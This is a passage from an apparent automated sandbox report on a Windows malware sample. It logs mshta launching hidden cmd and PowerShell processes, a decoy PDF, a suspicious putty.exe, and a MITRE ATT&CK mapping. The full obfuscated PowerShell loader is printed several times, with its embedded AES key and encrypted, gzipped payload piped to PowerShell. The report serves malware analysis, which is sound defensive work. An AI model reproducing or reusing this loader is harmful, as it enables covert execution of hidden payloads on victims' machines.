'aaaaaaaaaaaaaaaaaaaaapq3+yyuesdcp30fctt1g8+bllqdeek2rl0/q2v+83d4bffpss5iju6kfes1jzaaiijofb3qbz4arua/p0a2xkjm5iunw72eqrkskcntemtjharvolhxtff2y5wz5p2jtj8qoabdnbfsmoktklgidkmitv4lcg8milukzud9s+wkjzqzjtcjo/2g5kr/8oacycs/ngtky8eujifd3jjz5ylyw3ofjpf3mj9czn20cb8phyfovw8cht0xnvzcfmgo/e8zd5zqzfwg7smpcda2exuzdgajgu5thhwb7zeht3d3pib67d6q7vhjnkgbsiv6zcpofip7s25z6l2wgczc+2l0h4wg5atfmshceyxblkjml3+4vdt9rw3zep3gp2c/hy8udbeid77xxgk3+qrdnhalxw7kxafq6b8jyiffp3403hxtqvgreahvvf8yj2rvmsbdjplrnscmvgd9iqa7oxvubnuww9u2m23jisesq4uz7nhkfbozi8yuxfairoongw7ty7xud6uprxjtiawnnns2saqk/okx7moms6bgvr3yyh/sg2sq5kq7ryejpk4btikllkdmilzqnu8d/xf1cezaopnm27zbagy2uyzvlziepnimut6tkfecr+kqcrmydbfcsk/3rbypdzneodmrrjzuejpskcyj60ix9evqybktmtpkyyt4ygrr/6uu6i+3tyllqxzjjhnngbzyxvxwmnys9nzndpphf2bmyelnennqsng8rs0j4jtd9ozojo6orwxfy54hd1omi8rzby565/grqubrf9knj3pkkkx5lo7jjjkda49arw/ygaivigrgvzkfqolkwinuh3agyb/7frzuykelczmwxhr7gpjmxmpop3scshlt6p522cvjaclhmbxh8ebvj89klig5dng0o1y0kv3zj8qkxzcmfiht+wa0p7c89p9ihf41cm6qus0cjzqxjh76oprm8iujlcd9smmxukre8soplrje+s8rbdtv';$mehlazdc = 'd2z5wfdpd1vksxdqyxncrnhtrwrusfbtzgjqwlftsxo=';$pylehht = new-object 'system.security.cryptography.aesmanaged';$pylehht.mode = [system.security.cryptography.ciphermode]::ecb;$pylehht.padding = [system.security.cryptography.paddingmode]::zeros;$pylehht.blocksize = 128;$pylehht.keysize = 256;$pylehht.key = [system.convert]::frombase64string($mehlazdc);$bwops = [system.convert]::frombase64string($fnapop);$mkdtxwxs = $bwops[0..15];$pylehht.iv = $mkdtxwxs;$ialmfbndk = $pylehht.createdecryptor();$mvuygvuhe = $ialmfbndk.transformfinalblock($bwops, 16, $bwops.length - 16);$pylehht.dispose();$cxvqsolz = new-object system.io.memorystream( , $mvuygvuhe );$kpnxbbu = new-object system.io.memorystream;$ugbpshizt = new-object system.io.compression.gzipstream $cxvqsolz, ([io.compression.compressionmode]::decompress);$ugbpshizt.copyto( $kpnxbbu );$ugbpshizt.close();$cxvqsolz.close();[byte[]] $bsmmu = $kpnxbbu.toarray();$fpimsbr = [system.text.encoding]::utf8.getstring($bsmmu);$fpimsbr | powershell - }Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c powershell.exe $fnapop = 'aaaaaaaaaaaaaaaaaaaaapq3+yyuesdcp30fctt1g8+bllqdeek2rl0/q2v+83d4bffpss5iju6kfes1jzaaiijofb3qbz4arua/p0a2xkjm5iunw72eqrkskcntemtjharvolhxtff2y5wz5p2jtj8qoabdnbfsmoktklgidkmitv4lcg8milukzud9s+wkjzqzjtcjo/2g5kr/8oacycs/ngtky8eujifd3jjz5ylyw3ofjpf3mj9czn20cb8phyfovw8cht0xnvzcfmgo/e8zd5zqzfwg7smpcda2exuzdgajgu5thhwb7zeht3d3pib67d6q7vhjnkgbsiv6zcpofip7s25z6l2wgczc+2l0h4wg5atfmshceyxblkjml3+4vdt9rw3zep3gp2c/hy8udbeid77xxgk3+qrdnhalxw7kxafq6b8jyiffp3403hxtqvgreahvvf8yj2rvmsbdjplrnscmvgd9iqa7oxvubnuww9u2m23jisesq4uz7nhkfbozi8yuxfairoongw7ty7xud6uprxjtiawnnns2saqk/okx7moms6bgvr3yyh/sg2sq5kq7ryejpk4btikllkdmilzqnu8d/xf1cezaopnm27zbagy2uyzvlziepnimut6tkfecr+kqcrmydbfcsk/3rbypdzneodmrrjzuejpskcyj60ix9evqybktmtpkyyt4ygrr/6uu6i+3tyllqxzjjhnngbzyxvxwmnys9nzndpphf2bmyelnennqsng8rs0j4jtd9ozojo6orwxfy54hd1omi8rzby565/grqubrf9knj3pkkkx5lo7jjjkda49arw/ygaivigrgvzkfqolkwinuh3agyb/7frzuykelczmwxhr7gpjmxmpop3scshlt6p522cvjaclhmbxh8ebvj89klig5dng0o1y0kv3zj8qkxzcmfiht+wa0p7c89p9ihf41cm6qus0cjzqxjh76oprm8iujlcd9smmxukre8soplrje+s8rbdtv';$mehlazdc = 'd2z5wfdpd1vksxdqyxncrnhtrwrusfbtzgjqwlftsxo=';$pylehht = new-object 'system.security.cryptography.aesmanaged';$pylehht.mode = [system.security.cryptography.ciphermode]::ecb;$pylehht.padding = [system.security.cryptography.paddingmode]::zeros;$pylehht.blocksize = 128;$pylehht.keysize = 256;$pylehht.key = [system.convert]::frombase64string($mehlazdc);$bwops = [system.convert]::frombase64string($fnapop);$mkdtxwxs = $bwops[0..15];$pylehht.iv = $mkdtxwxs;$ialmfbndk = $pylehht.createdecryptor();$mvuygvuhe = $ialmfbndk.transformfinalblock($bwops, 16, $bwops.length - 16);$pylehht.dispose();$cxvqsolz = new-object system.io.memorystream( , $mvuygvuhe );$kpnxbbu = new-object system.io.memorystream;$ugbpshizt = new-object system.io.compression.gzipstream $cxvqsolz, ([io.compression.compressionmode]::decompress);$ugbpshizt.copyto( $kpnxbbu );$ugbpshizt.close();$cxvqsolz.close();[byte[]] $bsmmu = $kpnxbbu.toarray();$fpimsbr = [system.text.encoding]::utf8.getstring($bsmmu);$fpimsbr | powershell - Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $fnapop = 'aaaaaaaaaaaaaaaaaaaaapq3+yyuesdcp30fctt1g8+bllqdeek2rl0/q2v+83d4bffpss5iju6kfes1jzaaiijofb3qbz4arua/p0a2xkjm5iunw72eqrkskcntemtjharvolhxtff2y5wz5p2jtj8qoabdnbfsmoktklgidkmitv4lcg8milukzud9s+wkjzqzjtcjo/2g5kr/8oacycs/ngtky8eujifd3jjz5ylyw3ofjpf3mj9czn20cb8phyfovw8cht0xnvzcfmgo/e8zd5zqzfwg7smpcda2exuzdgajgu5thhwb7zeht3d3pib67d6q7vhjnkgbsiv6zcpofip7s25z6l2wgczc+2l0h4wg5atfmshceyxblkjml3+4vdt9rw3zep3gp2c/hy8udbeid77xxgk3+qrdnhalxw7kxafq6b8jyiffp3403hxtqvgreahvvf8yj2rvmsbdjplrnscmvgd9iqa7oxvubnuww9u2m23jisesq4uz7nhkfbozi8yuxfairoongw7ty7xud6uprxjtiawnnns2saqk/okx7moms6bgvr3yyh/sg2sq5kq7ryejpk4btikllkdmilzqnu8d/xf1cezaopnm27zbagy2uyzvlziepnimut6tkfecr+kqcrmydbfcsk/3rbypdzneodmrrjzuejpskcyj60ix9evqybktmtpkyyt4ygrr/6uu6i+3tyllqxzjjhnngbzyxvxwmnys9nzndpphf2bmyelnennqsng8rs0j4jtd9ozojo6orwxfy54hd1omi8rzby565/grqubrf9knj3pkkkx5lo7jjjkda49arw/ygaivigrgvzkfqolkwinuh3agyb/7frzuykelczmwxhr7gpjmxmpop3scshlt6p522cvjaclhmbxh8ebvj89klig5dng0o1y0kv3zj8qkxzcmfiht+wa0p7c89p9ihf41cm6qus0cjzqxjh76oprm8iujlcd9smmxukre8soplrje+s8rbdtv';$mehlazdc = 'd2z5wfdpd1vksxdqyxncrnhtrwrusfbtzgjqwlftsxo=';$pylehht = new-object 'system.security.cryptography.aesmanaged';$pylehht.mode = [system.security.cryptography.ciphermode]::ecb;$pylehht.padding = [system.security.cryptography.paddingmode]::zeros;$pylehht.blocksize = 128;$pylehht.keysize = 256;$pylehht.key = [system.convert]::frombase64string($mehlazdc);$bwops = [system.convert]::frombase64string($fnapop);$mkdtxwxs = $bwops[0..15];$pylehht.iv = $mkdtxwxs;$ialmfbndk = $pylehht.createdecryptor();$mvuygvuhe = $ialmfbndk.transformfinalblock($bwops, 16, $bwops.length - 16);$pylehht.dispose();$cxvqsolz = new-object system.io.memorystream( , $mvuygvuhe );$kpnxbbu = new-object system.io.memorystream;$ugbpshizt = new-object system.io.compression.gzipstream $cxvqsolz, ([io.compression.compressionmode]::decompress);$ugbpshizt.copyto( $kpnxbbu );$ugbpshizt.close();$cxvqsolz.close();[byte[]] $bsmmu = $kpnxbbu.toarray();$fpimsbr = [system.text.encoding]::utf8.getstring($bsmmu);$fpimsbr Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - }Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell - Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Research.pdfJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\putty.exe "C:\Users\user\putty.exe" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\putty.exeCode function: GetLocaleInfoA,10_2_0043E4F6
Source: C:\Users\user\putty.exeCode function: GetLocaleInfoA,10_2_004557F0
Source: C:\Users\user\putty.exeCode function: 10_2_0044F0C7 GetSystemTimeAsFileTime,__aulldiv,10_2_0044F0C7
Source: C:\Users\user\putty.exeCode function: 10_2_00450E96 _strlen,_strcat,_strncpy,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,10_2_00450E96
Source: C:\Users\user\putty.exeCode function: 10_2_0044F125 EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,GetCommandLineA,GetStartupInfoA,__wincmdln,GetModuleHandleA,10_2_0044F125
Source: C:\Users\user\putty.exeCode function: 10_2_0044675D GetProcAddress,GetUserNameA,GetUserNameA,GetUserNameA,10_2_0044675D
Source: C:\Users\user\putty.exeCode function: 10_2_00448341 socket,setsockopt,htons,inet_addr,htonl,htonl,htons,bind,WSAGetLastError,closesocket,listen,closesocket,WSAGetLastError,closesocket,10_2_00448341
Source: C:\Users\user\putty.exeCode function: 10_2_00447834 closesocket,socket,WSAGetLastError,setsockopt,setsockopt,setsockopt,htons,htonl,htons,bind,WSAGetLastError,htons,htonl,htons,connect,WSAGetLastError,10_2_00447834

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
1
Replication Through Removable Media		1
Native API		Path Interception11
Process Injection		1
Deobfuscate/Decode Files or Information		11
Input Capture		12
System Time Discovery		1
Replication Through Removable Media		1
Archive Collected Data		Exfiltration Over Other Network Medium12
Ingress Tool Transfer		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts212
Command and Scripting Interpreter		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
Obfuscated Files or Information		LSASS Memory11
Peripheral Device Discovery		Remote Desktop Protocol1
Email Collection		Exfiltration Over Bluetooth1
